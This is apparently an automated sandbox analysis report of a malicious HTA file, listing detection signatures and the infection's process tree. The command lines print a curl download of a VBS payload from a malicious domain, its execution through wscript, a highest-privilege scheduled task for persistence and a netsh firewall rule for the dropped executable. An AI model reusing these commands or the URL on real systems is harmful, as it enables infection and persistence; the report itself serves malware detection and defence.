Edit tour
Windows
Analysis Report
#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta
Overview
General Information
Sample name: | #U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.htarenamed because original name is a hash value |
Original sample name: | VER CUENTA_.hta |
Analysis ID: | 1544419 |
MD5: | 1f0b20b8e1b9c0267af0a33368e1d6c7 |
SHA1: | 4c0f0f757d4f84daaa301f8bf96648171eda3cdb |
SHA256: | 2a1bb69cee435a0cd61bc70387717fce0109108ec1d2e8cf79304a01a602a527 |
Infos: | |
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
Modifies the windows firewall
Potential malicious VBS script found (has network functionality)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Classification
- System is w10x64_ra
- mshta.exe (PID: 3860 cmdline:
"C:\Window s\SysWOW64 \mshta.exe " "C:\User s\user\Des ktop\#U274 9VER CUENT A#U2749_#U 2467#U2464 #U2465#U24 66#U2465#U 2466#U2463 #U2462.hta " {1E460BD 7-F1C3-4B2 E-88BF-4E7 70A288AF5} {1E460BD7- F1C3-4B2E- 88BF-4E770 A288AF5} MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 6988 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c cur l -k -o C: \Users\Pub lic\6720bd f2273b1.vb s https:// acess.mail cffemx.com //6720bdf2 272bc/6720 bdf2273b1. vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6996 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6800 cmdline:
curl -k -o C:\Users\ Public\672 0bdf2273b1 .vbs https ://acess.m ailcffemx. com//6720b df2272bc/6 720bdf2273 b1.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 4732 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 720bdf2273 b1.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6284 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 6300 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6720bdf22 73b1.vbs" MD5: FF00E0480075B095948000BDC66E81F0) - BLOCKBUSTER.exe (PID: 6096 cmdline:
"C:\_6720b df2272bc\B LOCKBUSTER .exe" MD5: 74D3F521A38B23CD25ED61E4F8D99F16) - schtasks.exe (PID: 5156 cmdline:
SCHTASKS / Query /TN "BLOCKBUST ER" MD5: 48C2FE20575769DE916F48EF0676A965) - conhost.exe (PID: 6740 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 1288 cmdline:
"C:\Window s\System32 \cmd.exe" /C SCHTASK S /Create /F /RL HIG HEST /TN " BLOCKBUSTE R" /TR "C: \_6720bdf2 272bc\BLOC KBUSTER.ex e" /SC ONL OGON /DELA Y 0001:00 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6548 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - schtasks.exe (PID: 6268 cmdline:
SCHTASKS / Create /F /RL HIGHES T /TN "BLO CKBUSTER" /TR "C:\_6 720bdf2272 bc\BLOCKBU STER.exe" /SC ONLOGO N /DELAY 0 001:00 MD5: 48C2FE20575769DE916F48EF0676A965) - cmd.exe (PID: 6172 cmdline:
"C:\Window s\System32 \cmd.exe" /C netsh a dvfirewall firewall add rule n ame="BLOCK BUSTER" di r=in actio n=allow pr ogram="C:\ _6720bdf22 72bc\BLOCK BUSTER.exe " enable=y es profile =any MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6428 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - netsh.exe (PID: 6252 cmdline:
netsh advf irewall fi rewall add rule name ="BLOCKBUS TER" dir=i n action=a llow progr am="C:\_67 20bdf2272b c\BLOCKBUS TER.exe" e nable=yes profile=an y MD5: 4E89A1A088BE715D6C946E55AB07C7DF) - cmd.exe (PID: 428 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 720bdf2273 b1.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6340 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 6564 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6720bdf22 73b1.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
- mshta.exe (PID: 6676 cmdline:
"C:\Window s\SysWOW64 \mshta.exe " "C:\User s\user\Des ktop\#U274 9VER CUENT A#U2749_#U 2467#U2464 #U2465#U24 66#U2465#U 2466#U2463 #U2462.hta " {1E460BD 7-F1C3-4B2 E-88BF-4E7 70A288AF5} {1E460BD7- F1C3-4B2E- 88BF-4E770 A288AF5} MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 6720 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c cur l -k -o C: \Users\Pub lic\6720bd f2273b1.vb s https:// acess.mail cffemx.com //6720bdf2 272bc/6720 bdf2273b1. vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6788 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 6728 cmdline:
curl -k -o C:\Users\ Public\672 0bdf2273b1 .vbs https ://acess.m ailcffemx. com//6720b df2272bc/6 720bdf2273 b1.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A) - cmd.exe (PID: 3988 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 720bdf2273 b1.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5400 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 6288 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6720bdf22 73b1.vbs" MD5: FF00E0480075B095948000BDC66E81F0) - cmd.exe (PID: 6544 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 720bdf2273 b1.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6596 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 6972 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \6720bdf22 73b1.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: frack113, Florian Roth (Nextron Systems): |
Source: | Author: frack113, Florian Roth: |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: frack113: |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Networking |
---|
Source: | Network Connect: |
Source: | Dropped file: | Jump to dropped file | ||
Source: | Dropped file: | Jump to dropped file |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |